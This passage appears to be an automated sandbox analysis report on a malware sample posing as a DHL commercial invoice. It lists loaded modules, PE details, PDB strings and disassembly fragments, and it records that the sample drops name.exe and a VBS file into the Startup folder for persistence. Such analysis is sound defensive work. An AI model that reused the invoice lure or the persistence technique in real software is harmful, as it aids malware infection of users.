Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe	Section loaded: slc.dll
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe	Section loaded: icu.dll
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe	Section loaded: container.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe	Section loaded: es.dll
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe	Section loaded: wer.dll
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe	Section loaded: credui.dll
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static file information: File size 1145344 > 1048576

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: explorer.pdbUGP source: svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2667304367.0000000000530000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.1447006703.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1448663351.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1451455558.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1449707067.0000000003800000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.0000000005370000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.000000000550E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1512748826.0000000005018000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1514643940.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.1585809461.0000000003460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.1587047954.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1591635154.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1589838750.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1632870881.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1625486793.000000000491A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000002.00000003.1447006703.0000000003EA0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.1448663351.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1512120743.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1451455558.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1512120743.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1449707067.0000000003800000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.0000000005370000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2684825001.000000000550E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1512748826.0000000005018000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1514643940.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000009.00000003.1585809461.0000000003460000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000009.00000003.1587047954.0000000003600000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1591635154.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1627471777.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1589838750.0000000003600000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1632870881.0000000004ACD000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1636234422.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000B.00000003.1625486793.000000000491A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: svchost.exe, 0000000A.00000003.1623794995.0000000005700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1624185049.0000000005900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1631509443.0000000005610000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1634982577.0000000000910000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: explorer.pdb source: svchost.exe, 00000003.00000003.1510322479.0000000005F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1508016117.0000000005A00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2667304367.0000000000530000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000004.00000002.2357034825.0000000010A5F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2683028624.000000000336B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2686373132.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.2692699255.000000000A24F000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000004.00000002.2357034825.0000000010A5F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.2683028624.000000000336B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2686373132.00000000058BF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000015.00000002.2692699255.000000000A24F000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: svchost.exe, 0000000A.00000003.1623794995.0000000005700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1624185049.0000000005900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1631509443.0000000005610000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 0000000B.00000002.1634982577.0000000000910000.00000040.80000000.00040000.00000000.sdmp

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_004042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004042DE

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00420A76 push ecx; ret	0_2_00420A89
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 2_2_00640A76 push ecx; ret	2_2_00640A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041F18F pushfd ; ret	3_2_0041F190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00416A48 push ecx; ret	3_2_00416A4A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0040E462 push C7DC0245h; retf	3_2_0040E46B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041D4D2 push eax; ret	3_2_0041D4D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041D4DB push eax; ret	3_2_0041D542
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041D485 push eax; ret	3_2_0041D4D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041D53C push eax; ret	3_2_0041D542
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041E5FF push es; ret	3_2_0041E600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0041774B push edi; retf	3_2_00417755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C0225F pushad ; ret	3_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C027FA pushad ; ret	3_2_03C027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD push ecx; mov dword ptr [esp], ecx	3_2_03C309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C0283D push eax; iretd	3_2_03C02858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C01368 push eax; iretd	3_2_03C01369
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C01065 push edi; ret	3_2_03C0108A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C018F3 push edx; iretd	3_2_03C01906
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCEB1E push esp; retn 0000h	3_2_03BCEB1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCEB02 push esp; retn 0000h	3_2_03BCEB03
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03BCE9B5 push esp; retn 0000h	3_2_03BCEAE7

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\directory\name.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0041F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0041F98E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_00491C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00491C41
